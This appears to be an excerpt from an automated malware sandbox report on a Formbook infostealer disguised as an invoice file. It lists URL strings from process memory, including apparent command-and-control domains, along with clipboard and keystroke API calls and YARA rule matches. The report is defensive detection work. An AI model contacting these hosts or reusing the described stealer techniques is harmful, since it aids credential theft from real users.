Source: explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ithin-ksvodn.xyz/ge07/
Source: explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ithin-ksvodn.xyz/ge07/www.rasko.net
Source: explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ithin-ksvodn.xyzReferer:
Source: explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.lsader.app
Source: explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.lsader.app/ge07/
Source: explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.lsader.app/ge07/www.epehr.pics
Source: explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.lsader.appReferer:
Source: explorer.exe, 00000003.00000003.2284743731.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3877356610.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3078894481.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1444179023.0000000009237000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.c
Source: explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.rasko.net
Source: explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.rasko.net/ge07/
Source: explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.rasko.net/ge07/www.lsader.app
Source: explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.rasko.netReferer:
Source: explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.rbuds.shop
Source: explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.rbuds.shop/ge07/
Source: explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.rbuds.shop/ge07/www.acifictechnologycctv.net
Source: explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.rbuds.shopReferer:
Source: explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.xhyx.top
Source: explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.xhyx.top/ge07/
Source: explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.xhyx.top/ge07/www.rbuds.shop
Source: explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.xhyx.topReferer:
Source: explorer.exe, 00000003.00000002.3879717070.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1446422764.000000000BC80000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
Source: explorer.exe, 00000003.00000000.1446422764.000000000BC80000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000003.00000000.1446422764.000000000BC80000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOSA4
Source: explorer.exe, 00000003.00000000.1446422764.000000000BC80000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOSd
Source: explorer.exe, 00000003.00000002.3874480808.000000000704E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1442543033.000000000702D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076788340.000000000703F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2288814616.000000000703F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3080898693.000000000704B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000003.00000000.1442543033.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000003.00000000.1444179023.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3876974501.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284743731.00000000090DA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
Source: explorer.exe, 00000003.00000002.3874480808.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1442543033.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0E948A694F8C48079B908C8EA9DDF9EA&timeOut=5000&oc
Source: explorer.exe, 00000003.00000000.1444179023.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3874480808.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3876974501.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284743731.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1442543033.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000003.00000000.1444179023.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3876974501.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284743731.00000000091FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.com
Source: explorer.exe, 00000003.00000000.1442543033.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000003.00000000.1442543033.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg
Source: explorer.exe, 00000003.00000002.3874480808.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1442543033.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg
Source: explorer.exe, 00000003.00000002.3874480808.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1442543033.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi
Source: explorer.exe, 00000003.00000002.3874480808.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1442543033.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000003.00000002.3874480808.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1442543033.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000003.00000002.3874480808.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1442543033.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT
Source: explorer.exe, 00000003.00000002.3874480808.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1442543033.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark
Source: explorer.exe, 00000003.00000002.3874480808.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1442543033.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k
Source: explorer.exe, 00000003.00000002.3874480808.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1442543033.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k-dark
Source: explorer.exe, 00000003.00000002.3874480808.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1442543033.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA
Source: explorer.exe, 00000003.00000002.3874480808.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1442543033.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA-dark
Source: explorer.exe, 00000003.00000000.1446422764.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879717070.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: explorer.exe, 00000003.00000002.3874480808.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1442543033.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11f7Wa.img
Source: explorer.exe, 00000003.00000002.3874480808.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1442543033.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000003.00000002.3874480808.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1442543033.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1b2aMG.img
Source: explorer.exe, 00000003.00000002.3874480808.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1442543033.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bjET8.img
Source: explorer.exe, 00000003.00000002.3874480808.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1442543033.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hGNsX.img
Source: explorer.exe, 00000003.00000002.3874480808.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1442543033.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAT0qC2.img
Source: explorer.exe, 00000003.00000002.3874480808.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1442543033.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
Source: explorer.exe, 00000003.00000002.3874480808.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1442543033.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBYTL1i.img
Source: explorer.exe, 00000003.00000000.1446422764.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879717070.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com
Source: explorer.exe, 00000003.00000000.1446422764.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879717070.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comer
Source: explorer.exe, 00000003.00000002.3874480808.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1442543033.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zeal
Source: explorer.exe, 00000003.00000002.3874480808.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1442543033.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000003.00000002.3874480808.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1442543033.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000003.00000000.1446422764.000000000BDF5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/EM0
Source: explorer.exe, 00000003.00000000.1446422764.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879717070.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.com48
Source: explorer.exe, 00000003.00000002.3874480808.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1442543033.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b
Source: explorer.exe, 00000003.00000002.3874480808.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1442543033.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it
Source: explorer.exe, 00000003.00000002.3874480808.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1442543033.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-big-3-mistakes-financial-advisors-say-that-the-1
Source: explorer.exe, 00000003.00000002.3874480808.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1442543033.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al
Source: explorer.exe, 00000003.00000002.3874480808.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1442543033.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi
Source: explorer.exe, 00000003.00000002.3874480808.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1442543033.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
Source: explorer.exe, 00000003.00000002.3874480808.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1442543033.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/sports/other/predicting-what-the-pac-12-would-look-like-after-expansion-wi
Source: explorer.exe, 00000003.00000002.3874480808.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1442543033.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world
Source: explorer.exe, 00000003.00000002.3874480808.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1442543033.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/sports/other/washington-state-ad-asks-ncaa-for-compassion-and-understandin
Source: explorer.exe, 00000003.00000002.3874480808.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1442543033.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
Source: explorer.exe, 00000003.00000002.3874480808.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1442543033.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/
Source: explorer.exe, 00000003.00000002.3874480808.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1442543033.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09
Source: explorer.exe, 00000003.00000002.3874480808.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1442543033.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt
Source: explorer.exe, 00000003.00000002.3874480808.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1442543033.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed

Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe

Code function: 0_2_0046C5D0 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,

0_2_0046C5D0

Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe

Code function: 0_2_00459FFF OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00459FFF

Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe

Code function: 0_2_0046C5D0 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,

0_2_0046C5D0

Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe

Code function: 0_2_00456354 GetCursorPos,ScreenToClient,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetWindowLongW,

0_2_00456354

Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe

Code function: 0_2_0047C08E SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_0047C08E

E-Banking Fraud

Malicious sample detected (through community Yara rule)

Source: Yara match	File source: 0.2.Invoice Packing list For Sea Shipment.exe.3060000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice Packing list For Sea Shipment.exe.3060000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.3869714162.0000000004950000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3868825943.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1493293667.0000000003B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3869667743.0000000004920000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1493319949.0000000003B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1492033473.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1439157854.0000000003060000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

System Summary

Source: 0.2.Invoice Packing list For Sea Shipment.exe.3060000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0.2.Invoice Packing list For Sea Shipment.exe.3060000.1.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.Invoice Packing list For Sea Shipment.exe.3060000.1.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Invoice Packing list For Sea Shipment.exe.3060000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0.2.Invoice Packing list For Sea Shipment.exe.3060000.1.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.Invoice Packing list For Sea Shipment.exe.3060000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.3869714162.0000000004950000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.3869714162.0000000004950000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.3869714162.0000000004950000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.3868825943.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.3868825943.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.3868825943.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.1493293667.0000000003B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.1493293667.0000000003B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.1493293667.0000000003B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.3869667743.0000000004920000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.3869667743.0000000004920000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.3869667743.0000000004920000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.1493319949.0000000003B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.1493319949.0000000003B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.1493319949.0000000003B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.1492033473.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.1492033473.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.1492033473.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.1439157854.0000000003060000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.1439157854.0000000003060000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
